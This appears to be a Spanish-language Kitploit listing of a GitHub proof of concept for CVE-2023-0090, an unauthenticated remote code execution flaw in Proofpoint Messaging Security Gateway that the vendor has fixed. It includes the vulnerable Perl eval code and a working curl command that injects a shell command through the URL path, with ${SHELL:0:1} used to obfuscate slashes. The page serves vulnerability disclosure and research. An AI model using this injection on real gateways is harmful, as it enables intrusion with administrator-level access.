Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
proofpoint-CVE-2023-0090 — Proofpoint Email Gateway: RCE no autenticado | Kitploit
Herramientas/GitHubGitHub/ly1g3/proofpoint-cve-2023-0090
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubly1g3/proofpoint-cve-2023-0090

proofpoint-CVE-2023-0090

Proofpoint Email Gateway: RCE no autenticado

Ver Repositorio
11hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Acerca de

Investigador de seguridad: ly1g3, ly1g3[at]tuta.io

Huella GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Resumen: Ejecución Remota de Código - RCE sin autenticación

CVE: CVE-2023-0090

Cronología:

  • Descubierto - ly1g3
  • Reportado - ly1g3
  • Corregido - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Exploits para Proofpoint Messaging Security Gateway

Ejecución Remota de Código (RCE)

Con acceso a la API de WebServices se puede lograr RCE sin autenticación con privilegios de administrador.

Técnico

Webservices.pm no sanitiza ni verifica la entrada del usuario. No se requiere autenticación para alcanzar la función, pero el acceso a la API debe estar habilitado en la configuración para poder hacer RCE. $module proviene directamente de los datos del usuario y es evaluado.

root@kitploit:~

my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";

...


eval("require $module");

POC

Creará un archivo llamado abc en /tmp/. Código ejecutado como usuario pps.

root@kitploit:~
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"
Descargar herramienta